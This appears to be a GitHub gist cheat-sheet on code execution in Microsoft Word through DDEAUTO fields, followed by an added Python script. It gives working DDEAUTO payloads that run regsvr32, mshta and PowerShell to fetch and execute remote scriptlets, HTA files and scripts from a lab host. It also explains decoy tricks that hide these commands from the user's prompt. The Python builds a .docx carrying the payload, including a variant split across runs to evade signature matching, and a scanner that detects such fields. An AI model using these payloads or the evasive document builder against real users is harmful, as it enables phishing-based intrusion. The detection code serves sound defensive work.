@mgeeky
Created February 2, 2018 00:08
Macro-Less Code Execution in MS Office via DDE (Dynamic Data Exchange) techniques Cheat-Sheet


  • Using the regsvr32 *.sct (COM scriptlet) technique: regsvr32 fetches the scriptlet from the /i: URL and runs it through scrobj.dll (/s silent, /n /u so that only DllInstall is called, not DllRegisterServer). Backslashes are doubled because a single backslash opens a switch in a Word field code; the made-up Office path followed by ..\..\..\.. still normalises to C:\Windows\System32\cmd.exe while dressing up the application path Word quotes in its prompt; and "Microsoft Office Application data" is a decoy that fails as a command, so cmd runs whatever follows ||:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"
  • Using the HTA technique: same cmd.exe path and || decoy, with mshta fetching and executing the HTA from the URL:
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/c Microsoft Office Application data   || mshta http://192.168.56.101/poc.hta"
  • Method from Empire. Downside: Word's prompt quotes the command line, and this payload puts no decoy text in front of the powershell.exe -NoP -sta -NonI sequence, so that sequence cannot be hidden from the user:
DDEAUTO C:\\Microsoft\\Programs\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\cmd.exe "/k  powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://192.168.56.101/default.ps1');powershell -noP -sta -w 1 -enc $e "
  • CactusTorch DDE can also generate the payload as a JS or VBS file; those variants run the file through cscript.

  • Another option is to use scripts by Dominic Spinosa found here

  • Another option is to stick with Unicorn by Dave Kennedy
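Added example, not part of mgeeky's gist: Python that builds a minimal .docx carrying the gist's regsvr32 DDEAUTO field (so you can see exactly where the field code lives in word/document.xml) and then scans a .docx for DDE/DDEAUTO fields. The scanner reassembles field instructions that are split across several w:instrText runs, which is the usual way the literal DDEAUTO string is hidden from per-run signature matching; a naive per-run check is included for comparison. The 192.168.56.101 host is the gist's lab address, and the generated document is a constructed sample, not a real phishing document.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# The gist's regsvr32 payload, verbatim. Backslashes are doubled because a
# single "\" opens a switch in Word field codes; the bogus Office path plus
# ..\..\..\.. normalises to C:\Windows\System32\cmd.exe; "Microsoft Office
# Application data" fails as a command so cmd runs the part after "||".
# 192.168.56.101 is the gist's lab host, not a live server.
DDE_PAYLOAD = (
    r"DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\"
    r"Windows\\System32\\cmd.exe "
    r'"/c Microsoft Office Application data   || '
    r'regsvr32 /s /n /u /i:http://192.168.56.101/empire2.sct scrobj.dll"'
)
# Minimal OPC parts so the output is a structurally valid .docx.
CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    "</Types>"
)
RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
    "</Relationships>"
)
# Field names are case-insensitive and Word normally writes a leading space.
DDE_RE = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)


def build_docx(instr_parts):
    """Return .docx bytes with one complex field whose instruction is spread
    over len(instr_parts) <w:instrText> runs. Word joins the runs, which is
    how the literal "DDEAUTO" gets split to dodge per-run string matching."""
    runs = ['<w:r><w:fldChar w:fldCharType="begin"/></w:r>']
    for part in instr_parts:
        escaped = part.replace("&", "&amp;").replace("<", "&lt;")
        runs.append(f'<w:r><w:instrText xml:space="preserve">{escaped}</w:instrText></w:r>')
    runs.append('<w:r><w:fldChar w:fldCharType="separate"/></w:r>')
    runs.append("<w:r><w:t>Microsoft Office</w:t></w:r>")  # cached field result
    runs.append('<w:r><w:fldChar w:fldCharType="end"/></w:r>')
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W}"><w:body><w:p>{"".join(runs)}</w:p></w:body></w:document>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", CONTENT_TYPES)
        z.writestr("_rels/.rels", RELS)
        z.writestr("word/document.xml", document)
    return buf.getvalue()


def field_instructions(document_xml):
    """Yield every field instruction in document.xml, reassembled: complex
    fields are fldChar begin / instrText* / separate? / end run sequences
    (nesting tracked with a stack); simple fields carry a w:instr attribute.
    root.iter() walks the tree in document order."""
    root = ET.fromstring(document_xml)
    stack = []
    for el in root.iter():
        tag = el.tag.rsplit("}", 1)[-1]
        if tag == "fldSimple":
            yield el.get(f"{{{W}}}instr", "")
        elif tag == "fldChar":
            kind = el.get(f"{{{W}}}fldCharType")
            if kind == "begin":
                stack.append([])
            elif kind == "end" and stack:
                yield "".join(stack.pop())
        elif tag == "instrText" and stack:
            stack[-1].append(el.text or "")


def find_dde_fields(docx_bytes):
    """Return the DDE/DDEAUTO field instructions in a .docx, stripped."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        xml = z.read("word/document.xml")
    return [i.strip() for i in field_instructions(xml) if DDE_RE.match(i)]


def naive_scan(docx_bytes):
    """Per-run check, for comparison: a split instruction slips past it."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        root = ET.fromstring(z.read("word/document.xml"))
    return any(DDE_RE.match(t.text or "") for t in root.iter(f"{{{W}}}instrText"))


if __name__ == "__main__":
    whole = build_docx([DDE_PAYLOAD])
    split = build_docx([" DD", "EAUTO ", DDE_PAYLOAD[len("DDEAUTO "):]])
    for name, doc in (("single run", whole), ("split runs", split)):
        print(f"{name}: naive={naive_scan(doc)} reassembled={find_dde_fields(doc)}")
```

Run it as-is to see the per-run check miss the split variant while the reassembling scanner still reports the full DDEAUTO instruction; point find_dde_fields at any .docx you receive to triage it offline. The same walk works for .dotx/.docm, and the QUOTE-field and other field-level obfuscations seen in the wild still have to pass through fldChar/instrText, so reassembling at that layer is the right place to look.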

Sources
